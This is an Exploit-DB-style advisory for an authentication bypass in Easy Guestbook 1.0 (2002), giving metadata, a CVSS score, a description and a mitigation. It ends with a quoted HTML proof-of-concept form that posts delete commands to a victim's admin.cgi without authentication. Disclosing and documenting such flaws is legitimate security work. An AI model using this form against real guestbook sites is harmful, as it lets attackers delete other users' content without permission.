Easy Guestbook v1.0 Vulnerabilities

vendor:

Easy Guestbook

by:

SecurityFocus

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Easy Guestbook

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:easy_guestbook:easy_guestbook:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Easy Guestbook v1.0 Vulnerabilities

Easy Guestbook 1.0 fails to properly authenticate users who wish to edit guestbooks, allowing an attacker to modify any user's guestbook by deleting entries.

Mitigation:

Ensure that authentication is properly implemented and enforced.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5341/info

The vulnerability has been reported for Easy Guestbook 1.0. It is possible for an atttacker to modify any user's guestbook by deleting entries. The vulnerability is the result of Guestbook failing to properly authenticate users who wish to edit guestbooks. 

<html>
<body>
<h1>Easy Guestbook v1.0 Vulnerabilities</h1>
<form method="POST" action="http://victim/guestbook/admin.cgi">
Delete No. of Entries in Guestbook: <input type="text" value="" name="function" size="5"> <input type="submit" value="Delete Message" name="delete_message" style="font-size: 10pt; font-family: verdana; font-weight: bold"><br><hr>
Open Administration Guestbook: <input type="submit" value="Back to Admin" name="back_to_admin" style="color: #800080; fo
nt-weight: bold">
</form>
</body>
</html>